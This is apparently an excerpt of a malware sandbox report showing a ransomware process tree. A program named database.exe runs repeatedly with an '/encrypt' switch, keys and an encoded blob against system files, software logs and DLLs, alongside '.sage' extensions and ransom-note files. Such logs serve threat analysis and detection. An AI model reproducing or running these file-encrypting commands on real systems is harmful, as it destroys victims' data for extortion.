C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\!HELP_SOS.hta"5⤵PID:3164
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Data Admin.exe"5⤵PID:5036
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\desktop.ini"5⤵
- Drops desktop.ini file(s)
PID:1428
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\pagefile.sys"5⤵PID:2548
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2010_x64.log-MSI_vc_red.msi.txt.sage"5⤵PID:4428
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2010_x86.log.html.sage"5⤵
- System Location Discovery: System Language Discovery
PID:2440
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log.sage"5⤵
- System Location Discovery: System Language Discovery
PID:2756
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log.sage"5⤵PID:4424
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2012_x86_1_vcRuntimeAdditional_x86.log.sage"5⤵PID:5992
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log.sage"5⤵PID:6064
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2013_x86_000_vcRuntimeMinimum_x86.log.sage"5⤵PID:1564
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x64_000_vcRuntimeMinimum_x64.log.sage"5⤵PID:1848
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x64_001_vcRuntimeAdditional_x64.log.sage"5⤵
- System Location Discovery: System Language Discovery
PID:4476
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x86_001_vcRuntimeMinimum_x86.log.sage"5⤵
- System Location Discovery: System Language Discovery
PID:2824
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x86_002_vcRuntimeAdditional_x86.log.sage"5⤵PID:4460
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceca35.dll"5⤵PID:2608
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlcecompact35.dll"5⤵PID:4704
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceme35.dll"5⤵PID:6036
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceqp35.dll"5⤵PID:3760
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlcese35.dll"5⤵PID:3804
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#Decrypt_Files_ReadMe#.rtf"5⤵PID:1428
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe"5⤵PID:1136
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ACE.dll"5⤵
- System Location Discovery: System Language Discovery
PID:1556
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Acrofx32.dll"5⤵PID:6068
-
-
